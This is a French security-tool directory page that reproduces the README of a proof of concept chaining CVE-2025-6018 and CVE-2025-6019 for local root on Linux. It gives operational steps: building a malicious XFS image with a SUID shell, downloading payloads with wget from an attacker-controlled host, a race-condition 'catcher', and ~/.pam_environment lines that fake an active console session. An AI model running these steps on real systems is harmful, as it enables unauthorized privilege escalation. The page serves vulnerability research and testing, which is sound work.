Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-6018-6019-PoC — Une preuve de concept pour enchaîner CVE-2025-6018 (contournement de session active PAM/Polkit) et CVE-2025-6019 (vulnérabilité SUID Mount dans libblockdev) afin d'obtenir une élévation de privilèges locale (LPE) sur des systèmes Linux vulnérables. | Kitploit
Outils/GitHubGitHub/michaelventurella
/cve-2025-6018-6019-poc
Escalade de PrivilègesAnalyse des VulnérabilitésExploitationTests d'IntrusionApprentissage et ÉducationLabs et Pratique
GitHubmichaelventurella/cve-2025-6018-6019-poc

CVE-2025-6018-6019-PoC

Une preuve de concept pour enchaîner CVE-2025-6018 (contournement de session active PAM/Polkit) et CVE-2025-6019 (vulnérabilité SUID Mount dans libblockdev) afin d'obtenir une élévation de privilèges locale (LPE) sur des systèmes Linux vulnérables.

Voir le dépôt
172il y a 6 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-6018 & CVE-2025-6019 : Preuve de concept d'escalade de privilèges locaux

Une preuve de concept robuste pour chaîner CVE-2025-6018 (contournement de session active PAM/Polkit) et CVE-2025-6019 (défaut de montage SUID dans libblockdev) afin d'obtenir un accès root sur les systèmes Linux vulnérables.

Disclaimer

Cet outil est destiné uniquement à des fins éducatives et à la recherche en sécurité autorisée. Ne l'utilisez pas sur des systèmes dont vous n'êtes pas propriétaire ou pour lesquels vous n'avez pas d'autorisation explicite de test.


La chaîne de vulnérabilités

Cet exploit enchaîne deux défauts logiques pour élever les privilèges d'un utilisateur standard à root :

  1. CVE-2025-6018 (L'entrée) : Une mauvaise configuration dans PAM/Polkit permet que les sessions SSH distantes soient marquées comme Active=yes. Cette astuce convainc le système que l'utilisateur distant est physiquement présent à la console, contournant ainsi les exigences de mot de passe pour les outils de gestion matérielle comme udisks2.
  2. CVE-2025-6019 (L'arme) : La bibliothèque libblockdev (utilisée par ) n'applique pas le drapeau de sécurité lors du montage temporaire d'un système de fichiers pour des opérations de maintenance (comme ou ).
udisks2
nosuid
Check
Resize

La chaîne de destruction

  1. Préparation : Nous créons une image XFS malveillante contenant un shell root SUID statique.
  2. Contournement : Nous nous appuyons sur l'état Active=yes de la session pour monter cette image en tant que périphérique loop sans mot de passe.
  3. Déclenchement : Nous émettons un appel D-Bus vers Filesystem.Check. Cela force udisks2 à monter temporairement l'image pour la vérifier. Crucialement, ce montage temporaire ne possède pas nosuid.
  4. Condition de course : Un programme C compilé (« The Sniper ») surveille /proc/mounts en temps réel. Dès que le montage temporaire apparaît, il exécute la charge utile SUID avant que le système ne le démonte.

Utilisation

Phase 1 : Préparation (machine attaquante)

Étant donné que la machine cible manque souvent d'outils comme mkfs.xfs ou gcc, nous générons la charge utile localement.

  1. Exécutez le script de construction sur Kali/Parrot :

    root@kitploit:~
    ./build_poc.sh
    
    • Crée exploit.img (image XFS de 400 Mo avec shell SUID).
    • Compile catcher (le gagnant de la condition de course).
  2. Téléversez les fichiers vers la cible : Démarrez un serveur Python :

    root@kitploit:~
    python3 -m http.server 80
    

    Sur la machine cible (par exemple, dans /tmp) :

    root@kitploit:~
    wget http://<YOUR_IP>/exploit.img
    wget http://<YOUR_IP>/catcher
    chmod +x catcher
    

Phase 2 : Exploitation (machine cible)

  1. Téléchargez le script d'exploitation : Enregistrez le contenu de exploit.sh de ce dépôt sur la machine cible.

  2. Exécutez l'exploit :

    root@kitploit:~
    chmod +x exploit.sh
    ./exploit.sh
    
  3. Profitez du root : Le script configurera automatiquement le périphérique loop, démarrera le catcher en arrière-plan et déclenchera la vulnérabilité. Vous devriez être immédiatement placé dans un shell root.


Dépannage

« Authentification requise pour configurer un périphérique loop »

Si le script demande un mot de passe, votre session SSH n'est pas active. Correctif :

  1. Créez ~/.pam_environment :
    root@kitploit:~
    echo "XDG_SEAT=seat0" > ~/.pam_environment
    echo "XDG_VTNR=1" >> ~/.pam_environment
    
  2. Déconnectez-vous et reconnectez-vous.
  3. Vérifiez avec loginctl show-session $XDG_SESSION_ID | grep Active. Il doit afficher Active=yes.

« Échec de la condition de course / Pas de shell »

La fenêtre vulnérable ne dure que quelques millisecondes.

  • Assurez-vous d'utiliser le catcher compilé en C (inclus dans build_poc.sh), et non une boucle Bash.
  • Le script utilise la méthode Filesystem.Check, qui est plus fiable que Resize.

Manifeste des fichiers

build_poc.sh (côté attaquant)

Automatise la création de l'image malveillante et compile les binaires statiques.

exploit.sh (côté cible)

L'orchestrateur. Il gère :

  1. La vérification de la session active.
  2. Le démarrage du catcher en arrière-plan.
  3. La configuration du périphérique loop via udisksctl.
  4. Le déclenchement de l'appel D-Bus Filesystem.Check.

Crédits

  • Découverte originale : équipe de recherche Qualys (CVE-2025-6018, CVE-2025-6019) https://www.helpnetsecurity.com/2025/06/18/chaining-two-lpes-to-get-root-most-linux-distros-vulnerable-cve-2025-6018-cve-2025-6019/
Télécharger l’outil